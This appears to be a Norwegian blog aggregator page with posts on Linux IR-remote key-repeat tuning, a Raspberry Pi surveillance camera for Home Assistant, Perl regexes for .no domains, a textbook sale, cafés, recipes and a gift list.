31. July, 2019

Fixing multiple button presses being detected on IR remote on Linux when using evdev

Skrevet av Einar Jørgen Haraldseid, 31. July 2019 23:10

Or: make your MCE remote work properly again on Kodi after upgrading to Ubuntu 18.04. No LIRC required.

Ever since I upgraded my Kodi box to Ubuntu 18.04, I’ve been having issues with my beloved remote control, the MCE remote from Microsoft. (I’ve had it for years, I have perfect muscle memory for all the buttons. All the most important buttons are within thumb reach.)

My remote, an MCE type 2

First, it wouldn’t work at all, and after some frustrating hours of problem shooting I got it sort-of, kind-of working, but it started repeating button presses, ignoring some buttons and generally being pretty useless. I eventually gave up on using the original IR receiver, and found that if I used a third party IR receiver acting like a HID device, I could tweak the keyboard bindings in Kodi to make it more or less feature complete.

That only left me with one annoyance: some buttons would register double presses. Worse, the all important «OK» button was one of them. Whenever I was navigating through my media, the double click would randomly start a movie I didn’t mean to, go to a season I didn’t intend etc. Changing options was also a big hassle, whenever I tried to toggle subtitles, they would generally un-toggle immediately.

I’ve been living with this for more than a year now, when I finally snapped and started looking into it again. I found I’m not the only one with this issue, as this blog post and this forum thread can attest. To summarize, my setup is currently this:

  • I have an MCE remote, as pictured
  • I’m not using the USB IR-receiver that came with the remote, I’m using a third party receiver that is being recognized by evdev as a HOLTEK sensor, and by lsusb as a Belkin device (1241:e000)
  • I’m not using LIRC at all

So, let’s get to the solution.

The Solution

The solution is deceptively simple, even trivial, once you know how.

First of all, you a couple of tools:

$ sudo apt-get install evtest ir-keytable

Using evtest, try to figure out which input device is the one that corresponds to your IR receiver. Some trial and error may be needed, but some devices are obviously not the correct one, such as «HDA Intel PCH Line Out», «Logitech BT Mini-Receiver» etc. Pick a device that looks promising, then start pressing some buttons on the remote. You know you have the right device when you see lots of lines getting printed.

Here’s a transcript of a successful run (with a bunch of irrelevant lines snipped out):

Input driver version is 1.0.1
Input device ID: bus 0x3 vendor 0x1241 product 0xe000 version 0x110
Input device name: "HOLTEK"
Supported events:
  Event type 0 (EV_SYN)
*SNIP*
Key repeat handling:
  Repeat type 20 (EV_REP)
    Repeat code 0 (REP_DELAY)
      Value    250
    Repeat code 1 (REP_PERIOD)
      Value     33
Properties:
Testing … (interrupt to exit)
Event: time 1564611021.168933, type 4 (EV_MSC), code 4 (MSC_SCAN), value 70028
Event: time 1564611021.168933, type 1 (EV_KEY), code 28 (KEY_ENTER), value 1
Event: time 1564611021.168933, -------------- SYN_REPORT ------------
Event: time 1564611021.428026, type 1 (EV_KEY), code 28 (KEY_ENTER), value 2
Event: time 1564611021.428026, -------------- SYN_REPORT ------------
Event: time 1564611021.468030, type 1 (EV_KEY), code 28 (KEY_ENTER), value 2
Event: time 1564611021.468030, -------------- SYN_REPORT ------------
Event: time 1564611021.508025, type 1 (EV_KEY), code 28 (KEY_ENTER), value 2
Event: time 1564611021.508025, -------------- SYN_REPORT ------------
Event: time 1564611021.548028, type 1 (EV_KEY), code 28 (KEY_ENTER), value 2
Event: time 1564611021.548028, -------------- SYN_REPORT ------------
Event: time 1564611021.588024, type 1 (EV_KEY), code 28 (KEY_ENTER), value 2
Event: time 1564611021.588024, -------------- SYN_REPORT ------------
Event: time 1564611021.608926, type 4 (EV_MSC), code 4 (MSC_SCAN), value 70028
Event: time 1564611021.608926, type 1 (EV_KEY), code 28 (KEY_ENTER), value 0
Event: time 1564611021.608926, -------------- SYN_REPORT ------------

A few things to note: REP_DELAY is set to 250, REP_PERIOD is set to 33. Also, we get multiple lines of the event type 1 (EV_KEY), code 28 (KEY_ENTER), value 2, this is all from the «OK» button being pressed briefly once. We can see that they all got fired within roughly 0.04 seconds of each other, or 40 milliseconds. That’s awfully close to the value of 33 for the period. The first event, with value 1, is fired 259 ms before the events with value 2. Again, that corresponds to the delay value of 250. This all happened within roughly 440 ms, less than half a second.

So how can we tweak the values for REP_DELAY and REP_PERIOD? I found the answer over on the MythTV wiki. The wiki also explains why we’re having issues: IR baud rates are slower than a typical keyboard, wired or wireless. It also suggests the values 500 and 250, so let’s apply that.

In my example, I found the receiver on device 3, so the command ends up looking like this:

$ sudo ir-keytable -D 500 -P 250 -d /dev/input/event3

Now, when I re-run the evtest command on my device, I get the following result when pressing the OK button:

Event: time 1564612895.905914, type 4 (EV_MSC), code 4 (MSC_SCAN), value 70028
Event: time 1564612895.905914, type 1 (EV_KEY), code 28 (KEY_ENTER), value 1
Event: time 1564612895.905914, -------------- SYN_REPORT ------------
Event: time 1564612896.409903, type 4 (EV_MSC), code 4 (MSC_SCAN), value 70028
Event: time 1564612896.409903, type 1 (EV_KEY), code 28 (KEY_ENTER), value 0
Event: time 1564612896.409903, -------------- SYN_REPORT ------------

That’s more like it! We get one instance of value 1 (key down), no instances of value 2 (key still down, repeating the key), and one instance of value 0 (key up). This time, the key press even lasted slightly more than 500 ms without issue. Success!

Side note: this is kinda, sorta, maybe a form of key debouncing. Just throwing that into this blog post for the search engines out there. I know I tried to use that as a keyword while researching this issue.

Making it stick

The tweaked values will get lost upon the next reboot, so how can we make the fix permanent? In the old days, you would put it in /etc/rc.local, but this is 2019, let’s use systemd! This is what the oneshot service was made for.

I created the file /etc/systemd/system/ir-keytable.service with the following contents (remember to tweak the command on the ExecStart line to suit your setup):

[Unit]
Description=Adjust delay and period for IR remote

[Service]
Type=oneshot
ExecStart=/usr/bin/ir-keytable -D 500 -P 250 -d /dev/input/event3
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

Then reload systemd and enable the service:

$ sudo systemctl daemon-reload
$ sudo systemctl enable ir-keytable.service

Phew. I hope all that can come in handy for someone else out there.

26. January, 2019

Mine beste kafékontor i Oslo

Skrevet av Ida Nyborg, 26. January 2019 12:36

Som frilanser med utpreget behov for å se folk ofte, er kaffesjapper det beste (og billigste) kontoret for meg. Her er mine go-to-steder i Oslo.

Felles for alle er at de har god plass, god kaffe og ikke for mange distraksjoner. Merk at sistnevnte er helt subjektivt; jeg har kanskje høyere terskel for å bli plaget av gjestetrafikk enn du har.

  1. PUST

    beste kafekontor i Oslo - Pust

    En ikke altfor mye omtalt perle på Majorstuen rett ved T-banen. Übertrendy lokale, men nedpå stemning. Hyggelig betjening som ikke forstyrrer deg.

    Av kaffe har de alt du trenger; også V60 hvis du er den typen (jeg er det litt). De har også mat, og ikke bare bakevarer, men også glutenfritt og morsomme drikker som kombucha.

    PUST har også gratis og sikret nett, alltid et pluss. Strøm er stort sett ikke noe problem. Det beste er den store plassen, og følelsen av å være et stille sted selv i et travelt område av Oslo. En del studenter, ettersom det er i nærheten av Blindern.

    Minus er at det er dyrt, 36 kroner for dagens kaffe. Har kun frokost og lunsj, og stenger klokka 17.00 på hverdager.

    beste kafekontor i oslo - pust

  2. Skatten

    Tidligere Nord og Natt på Tøyen. Jeg liker de stedene som ligger lett tilgjengelig; også denne ligger rett på T-banestasjonen.

    Det beste her er at de har et område innerst som er mer skjermet og uten vinduer, hvis du skulle trenge ekstra fokus. Ellers kan du sitte ved vinduet og smugkikke på folk som haster til og fra banen, jeg synes ofte det er litt gøy. De har også flere båser med sofa, som er kjekt for samarbeid. Strøm finnes overalt.

    De har både frokost, lunsj og middag, og er åpent fra tidlig til seint, men blir utested på kvelden. SUPERbusy i helgene, så dette er definitivt et hverdagskontor.

  3. Kulturhuset

    beste kafekontor i oslo - kulturhuset

    Det største kontoret Oslo har å by på. Ligger på Youngstorget og er stort sett travelt. Jeg liker det likevel fordi det har flere etasjer, føles ikke forstyrrende – selv i helgene – og man kan sitte uforstyrret lenge.

    Fungerer godt for samarbeid og alenejobbing, med både båser og enkeltbord med sofa. Gratis og sikret nett = tommel opp.

    Godt utvalg av frokost og lunsjvennlig mat. De har for eksempel VELDIG god falafeltallerken, jeg bare sier det. Blir forøvrig et ekstremt populært utested på kveldene. Dyrt er det også, men det er det stort sett overalt i Oslo.
    beste kafekontor i oslo - kulturhuset

  4. Stockfleths Prinsens gate

    LRM_EXPORT_444753425997917_20190317_115500960.jpegMin favorittkaffekjede i Oslo, og fortsatt den største filialen. To etasjer, hvor underetasjen er et hipstermekka i den forstand at interiøret ikke finnes nyere enn 1980 (øyeestimat). Jeg lever fint med det. Musikken som spilles er alltid bra, her kan jeg faktisk finne på å droppe ørepluggene.

    Bra sted for møter og samarbeid. Jobbet her mye da jeg var student rett ved siden av, og stedet har fortsatt mange gruppearbeidende studenter som klientell.

    Godt V60-utvalg. Ganske travelt, så kom tidlig. Ikke alltid strøm tilgjengelig, så hit kommer du ikke for de lengste øktene. Har matutvalg som en kafé, men også glutenfrie alternativ. Stenger 17.00.

    LRM_EXPORT_444815909366065_20190317_115603443.jpeg

 

Ps. Bare for å illustrere hvor mye kaffe er en del av min hverdag; her er en tekst fra da jeg prøvde – PRØVDE – å slutte.

19. January, 2019

Slik lykkes du med godt innhold

Skrevet av Ida Nyborg, 19. January 2019 9:55

Skrevet i 2016 for NXTA2N, som jeg jobbet for da.

Godt innhold kan drive både mer trafikk og mer salg til bedriften din på nett. Slik kommer du i gang.

Nettsiden deres skal naturligvis beskrive bedriften og hva den kan hjelpe kundene med, men gode artikler, inspirerende bilder eller video viser enda bedre hva dere kan. Derfor kan det være en god idé å opprette et eget område for publisering av innhold, for eksempel en blogg eller Instagram-konto.

Tallene viser at stadig flere internettbrukere i dag er interessert i relevant innhold fra eksperter fremfor å se annonser på nettsidene de besøker. I slutten av 2015 hadde 23 prosent av Norges internettbrukere installert annonseblokkering på sine datamaskiner (TNS Gallup, 2016). Det betyr at det er mye å hente på å investere i nyttig informasjon i tillegg til reklame.

Slik lager du godt innhold

Det trenger ikke være vanskelig, men du må huske disse tre tingene:

1. Skriv innhold som er relevant for din bedrift.

2. Skriv godt.

3. Sørg for at det du har skrevet er lett å finne.

Innholdet skal gjenspeile bedriftens ekspertise for potensielle kunder og ikke minst forsikre eksisterende kunder om at de har tatt rett valg. Informasjonen skal fremfor alt være riktig, og all tekst skal være skrevet grammatisk korrekt. Ingenting sier «uprofesjonell aktør» som en tekst full av skrivefeil. Bruk derfor mye tid på språkvask, det vil lønne seg. Henvis gjerne til statistikk eller kilder der det er aktuelt, slik at du får enda mer faglig tyngde i artikler om krevende tema.

Hva er dine kunder interessert i å lese om?

Dette er det første spørsmålet du bør stille deg. Er du en butikk som selger hageredskaper, er sannsynligheten stor for at kundene dine leter etter artikler om hagestell på nettet. Da er det lurt å være den aktøren som tilbyr slik informasjon. Flere bedrifter opplever at inspirasjonsblogger tiltrekker seg riktig målgruppe, gir dem nyttig innhold og så klart et påskudd til å handle varer i butikken. Interiør, hagearbeid, matlaging og håndarbeid er bare noen av områdene man kan velge.

Noen eksempler:

Jernias blogg

Norgesglasset på Instagram

Kremmerhuset på Instagram

Plantasjens inspirasjonsblogg

Maxbos inspirasjonsblogg

Hvor befinner potensielle kunder seg?

Det hjelper ikke å lage godt innhold hvis ingen finner det. Når du er klar for å publisere innholdet må du vite hvor du skal dele det. Analyseverktøy og statistikk kan fortelle deg hvor det er lurt å legge innsatsen. Noen vil oppleve at deres målgruppe er svært aktive på Facebook eller Instagram, mens andre bør fokusere mer på synlighet i søk. Det avhenger også av hvilken type innhold du har valgt å produsere. Visuelt innhold bør deles i kanaler som er tilpasset dette, for eksempel Instagram og Pinterest. Tekstbasert innhold bør deles på Facebook eller blogg.

Annonsere eller ikke annonsere?

Du kan betale for eksponering i tillegg til å spre innholdet organisk. Selv om du har optimalisert teksten din til Googles preferanser kan det være vanskelig å konkurrere med større aktører om populære tema. Da kan du annonsere på søkeresultater, eller betale for å nå din målgruppe på sosiale medier som Facebook.

Leie inn noen eller skrive selv?

Du kan velge å betale en ekspert for å lage innholdet du ønsker å publisere, du må bare vite hva du ønsker å oppnå. Vær tydelig om dine visjoner, hvem du ønsker å nå, og hvor mye du vil investere av tid og penger på prosjektet. Innholdsprodusenter vet hvordan man skal presentere et tema for spesifikke målgrupper, og hvordan man gjør innhold lett tilgjengelig.

Kort oppsummert

Godt innhold viser hva bedriften kan og gir gode relasjoner til merkevaren. Det kan lønne seg å bruke tid på å produsere og spre inspirerende innhold for å tiltrekke seg potensielle kunder.

Trenger du litt hjelp?

Jeg er tekstforfatter og markedsfører med lang erfaring i å nå ut til riktig målgruppe. Jeg brenner for godt innhold, og å snakke med riktig språk til målgruppen. Ta kontakt for en uforpliktende prat!

10. November, 2018

Starting to write. Again.

Skrevet av Christoffer Hallstensen, 10. November 2018 23:52

As all my years as a student has finally ended, quite a while ago actually. I have decided to give blogging another try. I have not decided on the format, content and language yet, but it will probably be related to my hobbies and thoughts about technology, cyber security, big data, programming, data analytics and other things I find interesting and want to share with the rest of the world. I am considering to write in my native language Norwegian because there are not really that many good blogs about cyber security and technology in Norwegian. I will probably keep writing in english as I saw some of my posts on my old blog found their ways into reference lists etc.

Anyways, stay tunes.

Cheers,

Christoffer¨

Starting to write. Again.

Skrevet av Christoffer Hallstensen, 10. November 2018 23:52

As all my years as a student has finally ended, quite a while ago actually. I have decided to give blogging another try. I have not decided on the format, content and language yet, but it will probably be related to my hobbies and thoughts about technology, cyber security, big data, programming, data analytics and other things I find interesting and want to share with the rest of the world. I am considering to write in my native language Norwegian because there are not really that many good blogs about cyber security and technology in Norwegian. I will probably keep writing in english as I saw some of my posts on my old blog found their ways into reference lists etc.

Anyways, stay tunes.

Cheers,

Christoffer¨

1. November, 2018

Julegaveønsker 2018

Skrevet av Einar Jørgen Haraldseid, 1. November 2018 17:46

Hei, hå, nå er det julegaveønsker igjen. Jeg ser jeg er to uker senere ute enn foregående år, jeg får skylde på alderen.

Som alltid: Det kan godt hende jeg kommer på noe lurt litt senere, så det er bare å sveipe innom hvis du er opprådd for noe å finne på.

  • Canon EVF-DC2 (i sølv)
  • RØDE VideoMic GO
  • En middels romslig verktøykasse (den jeg har nå er en tanke for liten)
  • Stiftepistol
  • Sånn der avstandsmåler som bruker laser
  • IKEA TRÅDFRI Adapter
  • TP-link TL-SG105E
  • Whisky (single malt)
  • Vin
  • Kul t-skjorte (str. M)
  • Et barskap, gjerne med plass til vinskapet jeg har fra før
  • En god bok
  • En god sigar til nyttårsaften
  • Giljotin til sigarer (sånn kniv du kutter av enden med)
  • En god lommekniv, gjerne egnet for mekking på PC
  • Originale NES-spill
  • Originale GameBoy-spill
  • Sokker (gjerne ull, str. 44)
  • Greenscreen (eksempel)
  • Musikk på vinyl (her kan du sjekke hva jeg har fra før)
  • Noe å oppbevare min meget moderate platesamling i
  • Noe fint til katta
  • En klem ❤

16. August, 2018

Using a Raspberry Pi as a surveillance camera in Home Assistant

Skrevet av Einar Jørgen Haraldseid, 16. August 2018 19:47

Background

For the last few months I’ve been slowly building out my home automation system, based on Home Assistant. I have a couple of basic requirements for anything I add to it: It shouldn’t break the bank, and I don’t want any cloud features. For one thing, I don’t want my devices to suddenly stop working because of service disruptions, bankruptcy or outright planned obsolescence, but more importantly: I want to control my personal data.

I have a couple of other guiding principles as well: devices and systems based on open source is preferred, and whenever that is impractical, the stuff I buy should at least be based on industry standards. No walled gardens, please!

For instance I ended up with IKEA Trådfri for my lights, partly because of this short review by Matthew Garrett. I’ve successfully mixed and matched light bulbs from IKEA and Philips. I’ve also invested in a USB stick for Z-Wave integration.

So when I started looking for ways to add some cameras to the system, I quickly realized that «reasonably priced» and «no cloud» don’t mix. There are some awesome networked cameras out there, especially the Xiaomi Xiaofang/Wyzecam devices have impressive specs and are surprisingly affordable. Too bad that they also come with those pesky clouds (though there are ways to turn that stuff off). I could have gone with more traditional surveillance cameras from companies like Axis or Planet, but they are much pricier, and would generally require a wired connection. 

So I gave up looking for my dream camera, partly because I finally had an excuse to start messing around with Raspberry Pi and its Camera Module V2!

Setting up the camera

All you need for this little project is the Raspberry Pi 3 Model B+, the Camera Module V2, a micro SD card for storage, a decent power supply, a nice case and some way to mount and articulate the camera, something like this.

After assembling the Pi and installing the latest version of Raspbian, (don’t forget to change the default password!) and connecting it to the network, you need to activate the camera module:

$ sudo raspi-config

Use the cursor keys to navigate to Interfacing Options → Camera, and activate it.

We also need to load the Video4Linux2 kernel module, which will expose the camera at /dev/video0. Add this line to /etc/modules-load.d/modules.conf:

bcm2835-v4l2

Now we should reboot the Pi to make the changes take effect.

Next we need some packages installed:

$ sudo apt-get install gstreamer1.0-tools gstreamer1.0-plugins-base gstreamer1.0-plugins-good gstreamer1.0-plugins-bad

This pulls in a hell of a lot of dependencies, but at the end we will have the necessary GStreamer modules to set up a pretty robust and versatile video stream. Next, we create a Systemd service by creating this file: /etc/systemd/system/raspicam.service:

[Unit]
Description=Raspberry Pi Camera Stream Service
After=network.target
[Service]
Type=simple
User=pi ExecStartPre=/usr/bin/v4l2-ctl -c video_bitrate=4000000 ExecStart=/usr/bin/gst-launch-1.0 v4l2src ! video/x-h264,width=1280,height=720,framerate=30/1 ! h264parse config-interval=1 ! matroskamux streamable=true ! tcpserversink host=::0 port=9000 sync=false sync-method=2
[Install] WantedBy=multi-user.target

Note the line ExecStartPre, this is where we can change the video bitrate. The default is 10 Mbit/s, which is a bit high. Note also the end of the ExecStart line, where we specify the port for the video stream. After we’re done editing the service file, we can notify Systemd about the change, enable the service and start it:

$ sudo systemctl daemon-reload
$ sudo systemctl enable raspicam.service
$ sudo systemctl start raspicam.service

Now we can test that the stream is up by opening it up in i.e. VLC on our computer: File → Open Network Stream → tcp://<your-raspberry-ip>:9000

You should be seeing a beautiful and crisp video stream in 1280×720 at 30 frames per second. If you want higher resolution, just change the width and height in the service file (though this will give you a more narrow view from the camera lens).

Adding it to Home Assistant

Once we have the stream up and running, we can add it to Home Assistant. For this, we need ffmpeg installed on the machine/device/VM/container running Home Assistant. How you go about doing this will vary, and is outside the scope of this howto, but a good starting point can be found here.

Adding the camera is pretty trivial, all you need are these lines in your configuration:

camera:
  - platform: ffmpeg
    name: Raspicam
    input: tcp://<your-raspberry-ip>:9000

At this point you can easily add more automation, for instance record a minute of video if motion is detected while you’re away:

shell_command:
  - record_raspicam_minute: ffmpeg -i tcp://<your-raspberry-ip>:9000 -an -c:v copy -t 00:01:00 /var/tmp/raspicam-{{ now().strftime("%Y-%m-%d_%H-%M-%S") }}.mkv

automation:
- id: record_camera_on_motion
alias: Record some video if motion is detected while away
trigger:
- platform: template
value_template: "{{ is_state('binary.some_detector', 'on') }}"
condition: - condition: template
value_template: "{{ not is_state('device_tracker.you', 'home') }}"
action:
- service: shell_command.record_raspicam_minute

Locking it down (a bit)

It’s probably a good idea to restrict access to the video stream, so that only the Home Assistant server can access it. I use UFW for this. Don’t forget to allow SSH!

$ sudo apt-get install ufw
$ sudo ufw allow ssh
$ sudo ufw allow from <your-home-assistant-host> to any port 9000 proto tcp
$ sudo ufw enable

21. May, 2018

Maritime ord og uttrykk

Skrevet av Einar Jørgen Haraldseid, 21. May 2018 9:10

Mens jeg blogget fra cruise-ferden i vinter så gjorde jeg mitt beste for å ramse opp de maritime ord og uttrykk jeg kunne komme på med feriehodet mitt. Det var ynkelige greier, så derfor vil jeg gjerne dele dette innslaget fra Språkteigen som jeg snublet over i dag:

https://radio.nrk.no/serie/spraakteigen/DMPO31000113/08-07-1995#t=2m46s

Innslaget ble sendt i reprise i 1995, og jeg aner ikke når det først ble sendt.

3. May, 2018

LiNC80 SBC1 kits are available for purchase!

Skrevet av Jon Langseth, 3. May 2018 19:40

I am proud to announce that as of now, my LiNC80 SBC1 is available for purchase in kit form at Tindie! It took me a few tries to get through the approval process, simply because the fairly high differences in the fairly high shipping costs incurred from using Posten Norge as my trusted carrier, forced […]

2. May, 2018

Digital I/O card for my Z50Bus computer

Skrevet av Jon Langseth, 2. May 2018 10:17

While working towards getting my LiNC80 SBC1 kits ready for sale, I had a little bit of waiting-time to cover. During that time, Steve Cousins and I were talking about his boot-up status output using a standard I/O port, and that it would be nice if I would be able to provide a digital I/O […]

16. March, 2018

Third-party software for a machine that’s not even shipping \o/

Skrevet av Jon Langseth, 16. March 2018 21:21

I mentioned in my previous post about the possibility for a ROM Monitor getting a port to my homebrew system. Yesterday, I received a mail, containing ASM-files and a compiled HEX file of the first attempt at a port. Even without access to hardware, Steve has been able to make a working version of SCMonitor […]

14. March, 2018

Status of the LiNC80 SBC1 mid march 2018

Skrevet av Jon Langseth, 14. March 2018 18:23

Here's an update to those who are following my "homebrew" tag to see if I actually end up making kits available. Kits are coming I'm most definitely working to get kits of this microcomputer available. I have updated my company page over at linc.no/products, and that will be the "home" of the product side of […]

21. January, 2018

Oksehaler

Skrevet av Middagstips, 21. January 2018 19:03

Ingredienser:

  • 1 kg oksehaler
  • 2 gulerøtter
  • 1 løk
  • 2 fedd hvitløk
  • 1 stilk stangselleri
  • 1 liten bunt timian
  • 1 laurbærblad

Fremgangsmåte:

Sett stekeovnen på 130 grader. Brun oksehalene og grønnsakene i smør eller en nøytral olje. Legg alle ingrediensene i en ildfast gryte og fyll på med vann så det dekker alt. Gi gryten et et oppkok og sett i stekeovnen. Oksehalene er ferdig etter ca. 4 timer.

Gulrotkake uten egg og melk

Skrevet av Middagstips, 21. January 2018 18:37

Velsmakende og saftig gulrotkake uten egg og melk. Oppskrift og illustrasjon lånt fra Det søte liv

Ingredienser:

  • 600 g hvetemel
  • 450 g sukker
  • 2 ss kanel
  • 2 ss kardemomme
  • 2 ts bakepulver
  • 2 ts natron
  • 1 ts salt
  • 3 dl vann
  • 3 dl olje
  • 2 ts eddik
  • 400 g gulrot (renset vekt)

Ostekrem:

  • 200 g kremost (se tips for vegansk alternativ)
  • 150 g smør (se tips for vegansk alternativ)
  • 500 g melis
  • 1 ts vaniljeekstrakt

Pynt:

  • 1 granateple
  • 50 g mandler

Fremgangsmåte:

Bland mel, sukker, krydder, bakepulver, natron og salt i en stor rørebolle.

I en annen bolle blandes vann, olje og eddik. Ha det våte i det tørre og rør til en fast, jevn deig.

Riv gulrøttene fint og bland inn i deigen til slutt.

Hell deigen i en liten, bakepapirkledd langpanne (ca 20×30 cm). Stek kaken midt i ovnen ved 175°C i ca. 30 minutter, eller til kaken er gjennomstekt. Avkjøl kaken i formen til den er kald.

20. December, 2017

Marinert Kalkun Sous Vide

Skrevet av Middagstips, 20. December 2017 8:09

Dagens eksperiment var et stykke marinert kalkunbryst. Kalkun har en lei tendens til å bli tørt, derfor prøver jeg å tilberede den med Sous Vide.

Kjøttstykket jeg valgte var 7-8 cm tykt. Etter 5 timer på 61 grader ble kalkunen både mør og saftig!

 

3. December, 2017

Svin ytrefilet Sous Vide

Skrevet av Middagstips, 3. December 2017 20:01

60 grader i 7-8 timer. Resultatet ble veldig bra.

12. November, 2016

Perl Regexp Oneliners and UTF-8

Skrevet av Anders Einar Hilden, 12. November 2016 22:00

For my project to find as many .no domains as possible, I needed a regexp for extracting valid domains. This task is made more fun by the inclusion of Norwegian and Sami characters in the set of valid characters.

In addition to [a-z0-9\-], valid dot-no domains can contain the Norwegian æ (ae), ø (o with stroke) and å (a with ring above) (Stargate, anyone?) and a number of Sami characters. ŧ (t with stroke), ç (c with cedilla) and ŋ (simply called “eng”) are some of my favourites.

The following code will print only the first match per line, and uses ŧ directly in the regexp.

1
2
echo "fooŧ.no baŧ.no" | perl -ne 'if(/([a-zŧ]{2,63}\.no)/ig) { print $1,"\n"; }'
fooŧ.no

If we replace if with while we will print any match found in the whole line.

1
2
3
echo "fooŧ.no baŧ.no" | perl -ne 'while(/([a-zŧ]{2,63}\.no)/ig) { print $1,"\n"; }'
fooŧ.no
baŧ.no

Because I’m afraid the regexp (specifically the non-ASCII characters) may be mangled by being saved and moved between systems, I want to write the Norwegian and Sami characters using their Unicode code points. Perl has support for this using \x{<number>} (see perl unicode)

1
2
3
echo "fooŧ.no baŧ.no" | perl -CSD -ne 'while(/([a-z\x{167}]{2,63}\.no)/ig) { print $1,"\n"; }'
fooŧ.no
baŧ.no

When using code points, I have to specify -CSD for the matching to work. I am not really sure why this is required. If you can explain, please comment or tell my by other means. As you can read in perlrun, -CSD specifies that STDIN, STDOUT, STDERR and all input and output streams should be treated as being UTF-8.

Another problem is that if this last solution is is fed invalid UTF-8, it will die fatally and stop processing input.

1
Malformed UTF-8 character (fatal) at -e line 1, <> line X.

To prevent this happening I currently sanitize my dirty input using iconv -f utf-8 -t utf-8 -c. If you have a better solution for this, Perl or otherwise, please tell me!.

A simple regexp would match the valid characters for a length between 2 and 63 followed by .no. However, I wanted only and all “domains under .no” as counted by Norid in their statistics. Norids definition of “domains under .no” are all the domains directly under .no, but also domains under category domains i.e. ohv.oslo.no and ola.priv.no. To get comparable results, I have to collect both *.no and *.<category domain>.no domains when scraping data.

The resulting “oneliner” I use is this…. It once was a oneliner, but with more than 10k characters in the regexp it was hard to manage. The resulting script builds up a regexp that is valid for all Norwegian domains using a list of valid category domains, all valid characters and other rules for .no domains.

11. September, 2015

Selling computer engineering books for bachelor in computer science and master in information security

Skrevet av Hans Åge Martinsen, 11. September 2015 18:00

Now that I have finished with my bachelor in computer science and realised that I will not be finishing my masters degree in information security I want to sell most of the books I have bought over the years. Most of these books are curriculum for the masters in information security and I will add books for the bachelors in computer science when I get around to it.

I will be selling these books through the Facebook group Bytte/selge for oss Studenter i Gjøvik, email and whichever way people get a hold of me. Whenever I sell a book or the book is reserved for someone, I will put a line over the book so that it is possible to know at any time which books are still available to buy. All prices are in NOK.

Books that are being or has been sold

ISBN Name Price
978-0-470-61303-0 Malware Analyst’s Cookbook and DVD 200.-
978-0-07-149568-4 Gray Hat Hacking - The Ethical Hacker's Handbook 150.-
978-0-7357-1265-2 Network Intrusion Detection - Third Edition 150.-
82-450-0274-7 Informasjonssikkerhet - Rettslige krav til sikker bruke av IKT 200.-
978-0-321-44442-4 The Art of Software Security Assessment 300.-
978-0-07-174245-0 Computer Forensics 100.-
978-1-59749-596-7 Digital Triage Forensics - Processing the Digital Crime Scene 200.-
978-0-7494-6485-1 IT Governance - An Internal Guide to Data Security and ISO … 250.-
978-0-201-44099-7 Computer Security - Art and Science 350.-
978-0-321-52550-5 Forensic Discovery 100.-
978-0-470-74115-3 Computer Security - Third Edition 200.-
978-0-13-148104-6 Counter Hack Reloaded - A Step by Step Guide to Computer .. 250.-
978-0-321-35670-3 Software Security - Building Security In 250.-
1-58053-369-8 Computer and Intrusion Forensics 450.-
0-8493-3378-4 Wireless Security Handbook 400.-
NO ISBN NUMBER Network Security - Lecture Notes 4th. edition 20.-
978-0-201-78695-8 Exploiting Software - How to Break Code 200.-
978-0-321-70325-5 Forensic Discovery 200.-
978-1-111-13823-3 Principles of Information Security - International Edition 350.-
978-1-4354-9883-9 Guide to Computer Forensics and Investigations - Fourth edition 350.-
978-0-13-513711-6 Computer Security - Principles and Practice 250.-
978-0-596-00764-5 XML In a Nutshell - A Desktop Quick Referance 200.-
978-1-59749-643-8 Digital Forensics for Legal Professionals 150.-
978-0-596-51582-9 Python for Unix and Linux System Administrators 150.-
666-6-6666-6666-6 Test book to demonstrate how a sold or reserved book will look like 666.-

Contact information

Send me an email at hamartin@moshwire.com and tell me which books you wish to buy or look at before deciding to buy. All books are currently in my office at GUC, K building, IT-Tjenesten.

Cheers,
Hans

Selling computer engineering books for bachelor in computer science and master in information security

Skrevet av Hans Åge Martinsen, 11. September 2015 18:00

Now that I have finished with my bachelor in computer science and realised that I will not be finishing my masters degree in information security I want to sell most of the books I have bought over the years.

I will be selling these books through the Facebook group Bytte/selge for oss Studenter i Gjøvik, email and whichever way people get a hold of me. Whenever I sell a book or the book is reserved for someone, I will put a line over the book so that it is possible to know at any time which books are still available to buy. All prices are in NOK.

Books that are being or has been sold

ISBN Name Price
978-0-470-61303-0 Malware Analyst’s Cookbook and DVD 200.-
978-0-07-149568-4 Gray Hat Hacking - The Ethical Hacker’s Handbook 150.-
978-0-7357-1265-2 Network Intrusion Detection - Third Edition 150.-
82-450-0274-7 Informasjonssikkerhet - Rettslige krav til sikker bruke av IKT 200.-
978-0-321-44442-4 The Art of Software Security Assessment 300.-
978-0-07-174245-0 Computer Forensics 100.-
978-1-59749-596-7 Digital Triage Forensics - Processing the Digital Crime Scene 200.-
978-0-7494-6485-1 IT Governance - An Internal Guide to Data Security and ISO … 250.-
978-0-201-44099-7 Computer Security - Art and Science 350.-
978-0-321-52550-5 Forensic Discovery 100.-
978-0-470-74115-3 Computer Security - Third Edition 200.-
978-0-13-148104-6 Counter Hack Reloaded - A Step by Step Guide to Computer Attacks and .. 250.-
978-0-321-35670-3 Software Security - Building Security In 250.-
1-58053-369-8 Computer and Intrusion Forensics 450.-
0-8493-3378-4 Wireless Security Handbook 400.-
NO ISBN NUMBER ON THIS Network Security - Lecture Notes 4th. edition 20.-
978-0-201-78695-8 Exploiting Software - How to Break Code 200.-
978-0-321-70325-5 Forensic Discovery 200.-
978-1-111-13823-3 Principles of Information Security - International Edition 350.-
978-1-4354-9883-9 Guide to Computer Forensics and Investigations - Fourth edition 350.-
978-0-13-513711-6 Computer Security - Principles and Practice 250.-
666-6-6666-6666-6 Test book to demonstrate how a sold or reserved book will look like 666.-

Contact information

Send me an email at hamartin@moshwire.com and tell me which books you wish to buy or look at before deciding to buy. All books are currently in my office at GUC, K building, IT-Tjenesten.

Cheers,
Hans

1. March, 2015

Email SPAM Continued

Skrevet av Hans Åge Martinsen, 1. March 2015 19:41

This post will be quite short, simply because my conclusion after implementing and testing two of the tools mentioned earlier in this post on a test server are quite different from what I imagined them to be. After testing both SpamAssassin and Amavisd-new I realized that these tools are not meant to be installed and forgotten to the same degree as the other tools I am using, they are meant to be used actively by the administrator to continually improve results by tweaking settings and inspecting the output.

Since my goal is to have a setup that primarily work for me and I wish to fiddle as little as possible with it, these two tools are simply to time demanding and the improved spam checking simply isn’t worth the extra time spent. For this reason I have simply let my server be as it was before I started this mini project and instead chose to teach those few users I have that on my server, some spam is to be expected and spent some time teaching them to recognize spam instead so that they could either just delete them manually or tell their client that it is spam and let that handle it instead.

